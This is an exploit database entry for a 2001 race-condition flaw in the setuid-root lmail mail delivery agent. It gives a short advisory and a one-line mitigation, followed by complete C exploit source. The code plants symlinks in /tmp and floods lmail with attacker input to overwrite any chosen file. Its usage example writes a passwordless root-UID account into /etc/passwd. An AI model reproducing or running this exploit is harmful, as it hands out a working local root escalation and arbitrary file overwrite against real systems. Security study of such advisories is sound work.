lmail Race Condition Vulnerability

vendor:

lmail

by:

Charles Stevenson

7.2

CVSS

HIGH

Race Condition

362

CWE

Product Name: lmail

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2001

lmail Race Condition Vulnerability

A race condition vulnerability exists in lmail. The lmail program makes insecure use of temporary files, making it susceptible to symbolic link attacks. The program also writes data from the standard input stream (stdin) directly to the temporary file. Because lmail is usually installed setuid root, it may be possible for a local user to overwrite any file on a system with arbitrary data.

Mitigation:

Ensure that lmail is not installed with setuid root privileges.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/2984/info

Jon Zeeff's lmail is a local mail delivery agent (LDA) designed to provide mail-to-pipe and mail-to-file aliasing for smail.

A race condition vulnerability exists in lmail. The lmail program makes insecure use of temporary files, making it susceptible to symbolic link attacks. The program also writes data from the standard input stream (stdin) directly to the temporary file.

Because lmail is usually installed setuid root, it may be possible for a local user to overwrite any file on a system with arbitrary data. 

/* lmail-xpl.c
 *
 * Quick hack to exploit lmail
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
 * $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core@ezlink.com>
 *
 * July 04 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 128

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   pid_t pid;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "lmail-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   pid = getpid();

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/lmail%d", pid+i);
      symlink(argv[1], temp);
   }

   sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
      //sleep(1);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
   system(temp);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}